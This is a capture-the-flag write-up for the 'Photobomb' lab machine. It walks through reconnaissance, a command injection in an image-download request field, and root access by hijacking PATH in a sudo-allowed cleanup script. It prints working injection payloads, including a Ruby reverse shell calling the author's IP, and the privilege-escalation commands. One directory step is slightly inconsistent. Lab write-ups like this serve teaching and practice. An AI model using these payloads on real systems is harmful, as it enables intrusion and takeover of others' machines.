
# Photobomb write-up 
_January 2023_

**Spoilers ahead!**

I started by checking what services were running on the machine with nmap.
```
 ~ > nmap --version-intensity 0 -p-10000 10.10.11.182             
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-01 22:52 WET
Nmap scan report for 10.10.11.182
Host is up (0.19s latency).
Not shown: 9998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```
I added the ip to `/etc/hosts`.

Looking at the page we can see there is a login.
Checking the page's javascript we can see how to bypass the login by using the url with credentials found in the js.

I started by messing with the requests sent to the server.
I tried deleting the rest of the response line just to see what would happen, as follows.
```
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg
```

<img alt="sinatra_backtrace.png" height="350" src="sinatra_backtrace.png"/>

With the received response I was now able to tell that the backend was using Sinatra, and that it checked if the request was a png or jpg image.
However, this is not being properly done: a "$" characters is missing at the end.
This means that it will accept any expressions beginning with "png" or "jpg", regardless of how the finish.
The regex expression should be `/^(jpg|png)$/` to validate the extension properly, one can confirm this [here](https://regexr.com/).


Next, I made a payload that would send a http request to my own machine, which I then put within the filetype field of the response in order to try to inject code in that field.

To do this I also ran netcat on port 80 with `nc -lvnp 80` to wait for the http request.
The following is the change made to the request using burp suite.
```
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=png;curl 10.10.16.53&dimensions=3000x2000
```

![got_the_http_request.png](got_the_http_request.png)

Having verified I was able to execute code on the target machine with the injection, I then sent a reverse shell to catch with netcat.
I used a ruby reverse shell.
```
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=png;ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.16.53",4444))'&dimensions=3000x2000
```
And success!

![got_reverse_shell.png](got_reverse_shell.png)

After this all I had to do was navigate to the directory above to get the user flag.

Next, I checked for dot files in `/home/wizard/photobomb` with `ls -la`, and found a file containing the user ssh credentials.

Next, using `sudo -l`, I checked what sudo permissions the current user had, and got the following output.
```
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
```

I investigated the file `/opt/cleanup.sh`. The file looked as follows.
```bash
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
```

On the last line one can see that the figures are given root ownership.
One can also see that the path to the `find` absolute command is not given.
One can exploit this by creating "another find command" somewhere, and adding it to the path upon execution of the script.
```bash
mkdir tmp
echo "/bin/bash" > tmp/find
sudo PATH=/tmp:$PATH /opt/cleanup.sh
```

And just like that, we get root access!

**Disclosure:** I spent a lot of time trying to make [the privilege escalation trick explained here](https://grumpygeekwrites.wordpress.com/2021/06/29/hackmyvm-beloved-walk-through-tutorial-writeup/) work because I did not notice I could have done it an easier way. 
I am disclosing this because it looked like an interesting exploit I may want/need to use in the future.


